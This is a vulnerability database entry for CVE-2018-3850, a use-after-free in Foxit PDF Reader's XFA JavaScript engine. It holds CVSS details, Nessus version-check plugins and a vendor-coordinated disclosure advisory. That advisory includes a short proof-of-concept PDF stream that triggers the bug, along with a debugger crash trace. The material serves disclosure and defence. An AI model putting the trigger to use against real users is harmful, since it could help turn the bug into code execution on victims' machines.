Vulnerabilities > CVE-2018-3850 - Use After Free vulnerability in Foxit PDF Reader 9.0.1.1049

047910
CVSS 8.8 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
foxit
CWE-416
nessus

Summary

An exploitable use-after-free vulnerability exists in the JavaScript engine Foxit Software Foxit PDF Reader version 9.0.1.1049. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If a browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.

Vulnerable Configurations

Part Description Count
Application
Foxit
1

Common Weakness Enumeration (CWE)

Nessus

  • NASL familyWindows
    NASL idFOXIT_PHANTOM_8_3_6.NASL
    descriptionAccording to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 8.3.6. It is, therefore, affected by multiple vulnerabilities.
    last seen2020-06-01
    modified2020-06-02
    plugin id119837
    published2018-12-21
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/119837
    titleFoxit PhantomPDF < 8.3.6 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(119837);
      script_version("1.3");
      script_cvs_date("Date: 2019/10/31 15:18:52");
    
      script_cve_id(
        "CVE-2017-14458",
        "CVE-2017-17557",
        "CVE-2018-3842",
        "CVE-2018-3843",
        "CVE-2018-3850",
        "CVE-2018-3853",
        "CVE-2018-10302",
        "CVE-2018-10303"
      );
      script_bugtraq_id(103942, 103999);
    
      script_name(english:"Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of Foxit PhantomPDF.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A PDF toolkit installed on the remote Windows host is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "According to its version, the Foxit PhantomPDF application (formally
    known as Phantom) installed on the remote Windows host is prior to
    8.3.6. It is, therefore, affected by multiple vulnerabilities.");
      # https://www.foxitsoftware.com/support/security-bulletins.php
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?2f244c3e");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Foxit PhantomPDF version 8.3.6 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-3853");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/07");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/05/07");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/12/21");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantom");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantompdf");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("foxit_phantom_installed.nasl");
      script_require_keys("installed_sw/FoxitPhantomPDF");
    
      exit(0);
    }
    
    include('vcf.inc');
    
    app = 'FoxitPhantomPDF';
    
    app_info = vcf::get_app_info(app:app, win_local:TRUE);
    
    constraints = [{
      'min_version' : '8.0',
      'max_version' : '8.3.5.30351',
      'fixed_version' : '8.3.6'
      }];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
    
  • NASL familyWindows
    NASL idFOXIT_READER_9_1_0_5096.NASL
    descriptionThe version of Foxit Reader installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen2020-04-30
    modified2018-04-27
    plugin id109399
    published2018-04-27
    reporterThis script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/109399
    titleFoxit Reader < 9.1 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(109399);
      script_version("1.6");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/04/27");
    
      script_cve_id(
        "CVE-2017-14458",
        "CVE-2017-17557",
        "CVE-2018-3842",
        "CVE-2018-3850",
        "CVE-2018-3853"
      );
      script_bugtraq_id(103942);
      script_xref(name:"ZDI", value:"ZDI-18-312");
      script_xref(name:"ZDI", value:"ZDI-18-313");
      script_xref(name:"ZDI", value:"ZDI-18-315");
      script_xref(name:"ZDI", value:"ZDI-18-329");
      script_xref(name:"ZDI", value:"ZDI-18-330");
      script_xref(name:"ZDI", value:"ZDI-18-331");
      script_xref(name:"ZDI", value:"ZDI-18-332");
      script_xref(name:"ZDI", value:"ZDI-18-335");
      script_xref(name:"ZDI", value:"ZDI-18-339");
      script_xref(name:"ZDI", value:"ZDI-18-340");
      script_xref(name:"ZDI", value:"ZDI-18-341");
      script_xref(name:"ZDI", value:"ZDI-18-342");
      script_xref(name:"ZDI", value:"ZDI-18-344");
      script_xref(name:"ZDI", value:"ZDI-18-345");
      script_xref(name:"ZDI", value:"ZDI-18-346");
      script_xref(name:"ZDI", value:"ZDI-18-348");
      script_xref(name:"ZDI", value:"ZDI-18-349");
      script_xref(name:"ZDI", value:"ZDI-18-350");
      script_xref(name:"ZDI", value:"ZDI-18-351");
      script_xref(name:"ZDI", value:"ZDI-18-352");
      script_xref(name:"ZDI", value:"ZDI-18-354");
      script_xref(name:"ZDI", value:"ZDI-18-358");
      script_xref(name:"ZDI", value:"ZDI-18-359");
    
      script_name(english:"Foxit Reader < 9.1 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of Foxit Reader.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A PDF viewer installed on the remote Windows host is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Foxit Reader installed on the remote Windows host is
    prior to 9.1. It is, therefore, affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"see_also", value:"https://www.foxitsoftware.com/support/security-bulletins.php");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Foxit Reader version 9.1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-14458");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/19");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/04/19");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/27");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:foxit_reader");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("foxit_reader_installed.nasl");
      script_require_keys("installed_sw/Foxit Reader");
    
      exit(0);
    }
    
    include('vcf.inc');
    
    app = 'Foxit Reader';
    
    app_info = vcf::get_app_info(app:app, win_local:TRUE);
    
    constraints = [{
      'min_version' : '9.0',
      'fixed_version' : '9.1.0.5096'
      }];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
    
  • NASL familyWindows
    NASL idFOXIT_PHANTOM_9_1_0_5096.NASL
    descriptionAccording to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen2020-06-01
    modified2020-06-02
    plugin id109398
    published2018-04-27
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/109398
    titleFoxit PhantomPDF < 9.1 Multiple Vulnerabilities
  • NASL familyWindows
    NASL idFOXIT_PHANTOM_9_1_0.NASL
    descriptionAccording to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen2020-04-30
    modified2018-12-21
    plugin id119838
    published2018-12-21
    reporterThis script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/119838
    titleFoxit PhantomPDF < 9.1 Multiple Vulnerabilities

Seebug

bulletinFamilyexploit
description### Summary An exploitable use-after-free vulnerability exists in the JavaScript engine Foxit Software Foxit PDF Reader version 9.0.1.1049. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If a browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability. ### Tested Versions Foxit PDF Reader 9.0.1.1049. ### Product URLs https://www.foxitsoftware.com/products/pdf-reader/ ### CVSSv3 Score 8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H ### CWE CWE-416: Use After Free ### Details Foxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support posses an additional attack surface. Additionally, Foxit PDF Reader supports XFA or XML Forms Architecture, which is a new way of making interactive PDF forms. If a document containing XFA forms executes JavaScript code that closes the active document, a specific XFA method is invoked, which keeps a stale reference to a now freed object can lead to a use-after-free condition, which can be abused to execute arbitrary code. This particular vulnerability lies in this.xfa.clone() method, which triggers a use-after-free condition when the following code is executed in a regular PDF document: ``` 1348 0 obj << /Length 25 >> stream app.activeDocs[0].closeDoc( ); this.xfa.clone( ); endstream endobj ``` Opening this proof-of-concept PDF document in Foxit Reader with PageHeap enabled results in the following crash (note that Foxit Reader will pop up a warning that the file is damaged due to malformed XFA objects, which is of no consequence to triggering the vulnerability): ``` (24c.834): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for FoxitReader.exe - eax=11deaef8 ebx=00000000 ecx=12edadb0 edx=0027e90c esi=11deaef8 edi=0027e9d8 eip=01910916 esp=0027e8c8 ebp=0027e8cc iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 FoxitReader!CertFreeCertificateChain+0x64536: 01910916 8b01 mov eax,dword ptr [ecx] ds:0023:12edadb0=???????? 0:000> !heap -p -a ecx address 12edadb0 found in _DPH_HEAP_ROOT @ 72e1000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 12e51b2c: 12eda000 2000 6b2e90b2 verifier!AVrfDebugPageHeapFree+0x000000c2 777569d4 ntdll!RtlDebugFreeHeap+0x0000002f 77719e5b ntdll!RtlpFreeHeap+0x0000005d 776e6416 ntdll!RtlFreeHeap+0x00000142 75b9c5f4 kernel32!HeapFree+0x00000014 02c4b1fb FoxitReader!CertFreeCertificateChain+0x0139ee1b 0127eab8 FoxitReader+0x000ceab8 01280ae8 FoxitReader+0x000d0ae8 013c79de FoxitReader+0x002179de 013c77ab FoxitReader+0x002177ab 013d698a FoxitReader+0x0022698a 013c13f7 FoxitReader+0x002113f7 013c1218 FoxitReader+0x00211218 02aa24f9 FoxitReader!CertFreeCertificateChain+0x011f6119 02aa63fc FoxitReader!CertFreeCertificateChain+0x011fa01c 02aa648b FoxitReader!CertFreeCertificateChain+0x011fa0ab 75a9c4b7 USER32!InternalCallWinProc+0x00000023 75a9c5b7 USER32!UserCallWinProcCheckWow+0x0000014b 75a95264 USER32!SendMessageWorker+0x000004d0 75a95552 USER32!SendMessageW+0x0000007c 013bee15 FoxitReader+0x0020ee15 02aa8172 FoxitReader!CertFreeCertificateChain+0x011fbd92 02aa24f9 FoxitReader!CertFreeCertificateChain+0x011f6119 02aa63fc FoxitReader!CertFreeCertificateChain+0x011fa01c 02aa648b FoxitReader!CertFreeCertificateChain+0x011fa0ab 75a9c4b7 USER32!InternalCallWinProc+0x00000023 75a9c5b7 USER32!UserCallWinProcCheckWow+0x0000014b 75a95264 USER32!SendMessageWorker+0x000004d0 75a95552 USER32!SendMessageW+0x0000007c 012ea7c7 FoxitReader+0x0013a7c7 01916eb9 FoxitReader!CertFreeCertificateChain+0x0006aad9 01924769 FoxitReader!CertFreeCertificateChain+0x00078389 0:000> ``` Analyzing the heap state clearly shows that ecx points to a freed memory region. If we examine the next few instructions we can see the following: ``` FoxitReader!CertFreeCertificateChain+0x64536: 01910916 8b01 mov eax,dword ptr [ecx] 01910918 8b5008 mov edx,dword ptr [eax+8] 0191091b 57 push edi 0191091c ffd2 call edx 0191091e 85c0 test eax,eax 01910920 745a je FoxitReader!CertFreeCertificateChain+0x6459c (0191097c) 01910922 8b4e5c mov ecx,dword ptr [esi+5Ch] 01910925 8b01 mov eax,dword ptr [ecx] 0:000> ``` We can see that there is a call instruction immediately after the dereference of ecx, which we know to be free. With proper memory layout control, a memory chunk pointed to by ecx can be reallocated before it is reused, which gives full control over its content, and can ultimately result in EIP control and arbitrary code execution. ### Timeline * 2018-02-26 - Vendor Disclosure * 2018-04-01 - Vendor pushed release to mid April * 2018-04-19 - Vendor patch released * 2018-04-19 - Public disclosure
idSSV:97302
last seen2018-06-08
modified2018-05-17
published2018-05-17
reporterKnownsec
titleFoxit PDF Reader JavaScript XFA Clone Remote Code Execution Vulnerability(CVE-2018-3850)

Talos

idTALOS-2018-0532
last seen2019-05-29
published2018-04-19
reporterTalos Intelligence
sourcehttp://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0532
titleFoxit PDF Reader JavaScript XFA Clone Remote Code Execution Vulnerability